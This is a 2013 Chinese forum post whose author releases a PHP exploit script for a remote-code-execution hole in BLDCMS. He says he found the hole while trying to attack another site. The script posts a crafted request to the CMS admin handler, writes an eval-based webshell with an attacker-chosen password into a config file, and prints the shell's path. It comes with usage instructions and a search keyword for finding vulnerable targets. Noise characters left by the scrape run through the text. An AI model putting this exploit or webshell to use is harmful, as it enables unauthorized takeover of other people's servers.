之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
. f8 W" K u2 @9 ~0 p0 G$ O. O
H% ^# d8 r( m$ f2 X+ g1 l. P: g
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 ) {' D. [0 X! ^* t# m A7 S M/ V8 y
- W( [) K& ` A- f# L6 O
既然都有人发了 我就把我之前写好的EXP放出来吧
. X1 G: N, G( K " O% v, [2 ~" a3 y
view source print?01.php;">
1 |0 l$ K8 O7 X8 r+ w! }02.<!--?php
4 p, z% \ _+ D03.echo "-------------------------------------------------------------------8 H: A" G; L. _1 ^% B
04. 2 d" [9 S3 T1 O
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
1 r4 P, L5 {- e2 k, P3 n6 O7 U06.
+ a+ g8 c- K8 q- v, j m: t d$ d07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
( m( w( S( f1 X08.
( A! u8 e" W" I, q; _09.QQ:981009941\r\n 2013.3.21\r\n ; t; w* A6 F6 P6 f4 f- H6 O
10. & z; C' b U; ]0 P
11.
& h: Q# K5 I5 y1 Q3 X12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码5 `" Y: a: O/ [" w1 ?
13. 8 R# [5 K0 w( b9 p ]" a. C
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
; ^7 h2 C5 S* L* R; u A15.
' i. B( z; A+ W- { v" {16.--------------------------------------------------------------------\r\n";8 y+ b1 J& t) k
17.$url=$argv[1];
, w% w' c1 M& S7 k2 d. `% ]) z18.$dir=$argv[2];
# B8 s; S% `# _6 I19.$pass=$argv[3];3 m7 w" J3 N: x8 b& G
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
7 g! P E: p- w' C8 `+ |+ |21.if (emptyempty($pass)||emptyempty($url))
! I1 ]) ]5 Y q22.{exit("请输入参数");}% U; G4 W" Y* O! q! Q
23.else5 m- s; s4 R1 ?% f
24.{
- y1 @0 H: Q B$ z( V# n5 K0 b9 c25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
4 q K) o, a( ^7 ]26.
! m& C% v; \0 b4 C o0 y( f7 g27.al;
8 O3 b% ?, s/ t28.$length = strlen($fuckdata);
* e, M& u' s' s29.function getshell($url,$pass)
2 d; L$ t- n, b0 h( F' c* v30.{
! L- C/ J6 I* ?: f31.global $url,$dir,$pass,$eval,$length,$fuckdata;
/ L" l/ L# u9 ]5 i/ G# J32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
- K! K9 Y$ a8 L" [. A33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
5 q. Z1 B, K6 a+ @34.$header .= "User-Agent: MSIE\r\n";
U+ n: C- C8 t$ I$ {9 B35.$header .= "Host:".$url."\r\n";
% c5 F; k' j c/ L, E1 q5 ]+ H% ^5 O36.$header .= "Content-Length: ".$length."\r\n";
2 t+ O$ @8 S4 M/ H37.$header .= "Connection: Close\r\n";9 l, F8 x1 _# F" `' L
38.$header .="\r\n";
; E9 r" c1 R$ ]+ w& V* z* ]& y; Z39.$header .= $fuckdata."\r\n\r\n";
9 p ?- n8 L" b/ Q: w40.$fp = fsockopen($url, 80,$errno,$errstr,15);
/ }5 i# X; @* W/ s41.if (!$fp)
8 v+ W h* x; x4 Q1 c42.{
) x3 ?' z2 S# Z" X43.exit ("利用失败:请检查指定目标是否能正常打开");" T* t" G' J( |7 }; D- X
44.}
) v1 h4 s; B1 f8 H) m, X45.else{ if (!fputs($fp,$header))
% S( z6 Y, T) a v6 X46.{exit ("利用失败");}
' h4 s( i5 \. ~8 u47.else
/ X9 J: [' m1 Z# I48.{; z5 ~/ q; g, i7 X0 G! K5 l2 g: c
49.$receive = '';+ t7 w+ f8 Y1 M
50.while (!feof($fp)) {2 d0 M. x: k# J( M, q
51.$receive .= @fgets($fp, 1000);- U [+ W3 q4 u
52.}2 @: A! L9 ]" \4 z
53.@fclose($fp);9 o7 x; P% e( h: s" N& r% l. n
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标 h+ ~/ o) W1 `6 Q
55.
U4 {2 b& O* Z, E0 Y5 O56.GPC是否=off)";! c3 o# p! i" Z
57.}}( ]: X/ R1 a; i$ @9 x6 f
58.}+ N" S* D! p% \# G
59.}
8 u5 Q9 b. H0 ?* d% Y- m, p0 v60.getshell($url,$pass);& K% B* d( g3 }& i# c
61.?-->
% S' h* p4 ?' M0 b) K * j. w; l5 L5 h) F: U
5 u3 T2 D5 u$ F: ?3 v; P) y
3 N* g3 x# B u5 H( x$ `# S: b0 \
by 数据流
$ U+ O5 k0 Y% ^& [ |
发表于 2013-3-26 20:49:10
收藏
支持
反对